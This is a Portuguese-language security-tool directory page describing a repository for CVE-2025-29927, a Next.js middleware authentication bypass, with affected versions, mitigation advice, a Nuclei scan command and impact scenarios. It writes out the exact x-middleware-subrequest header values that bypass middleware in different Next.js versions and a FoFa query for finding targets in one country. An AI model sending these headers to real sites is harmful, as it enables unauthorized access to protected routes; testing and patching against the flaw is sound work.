Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29927 — CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js | Kitploit
Ferramentas/GitHubGitHub/kh4sh3i/cve-2025-29927
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js

Ver Repositório
24há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar



CVE-2025-29927

CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js Este repositório demonstra a vulnerabilidade CVE-2025-29927 no Next.js, onde o cabeçalho interno x-middleware-subrequest pode ser usado para contornar verificações de middleware, como autenticação.

Versões Afetadas

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

Mitigação e Remediação

  • Atualize o Next.js para versões corrigidas:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • Se a atualização não for imediatamente possível, bloqueie ou remova o cabeçalho x-middleware-subrequest no servidor web ou nível de proxy:

Cenários de Impacto

  • Bypass de Autorização: Atacantes podem acessar rotas protegidas sem autenticação ou autorização adequada.
  • Bypass de Política de Segurança de Conteúdo (CSP): Se cabeçalhos CSP forem adicionados via middleware, atacantes podem contornar esses controles de segurança, potencialmente permitindo ataques de cross-site scripting (XSS).
  • Negação de Serviço via Envenenamento de Cache: Em certas configurações, atacantes podem envenenar caches com conteúdo não autorizado ao contornar middleware que define cabeçalhos de controle de cache.

Usando o template Nuclei nextjs-CVE-2025-29927

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

Exploração em Diferentes Versões do Next.js

  • Para versões anteriores a 12.2: x-middleware-subrequest: pages/_middleware x-middleware-subrequest: pages/dashboard/_middleware x-middleware-subrequest: pages/dashboard/panel/_middleware

  • Para versões 12.2 e posteriores: x-middleware-subrequest: middleware x-middleware-subrequest: src/middleware

  • Para versões 13.2.0 e posteriores: x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Caçando alvos com FoFa

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

CTF gratuito para isso

  • CTF
Baixar ferramenta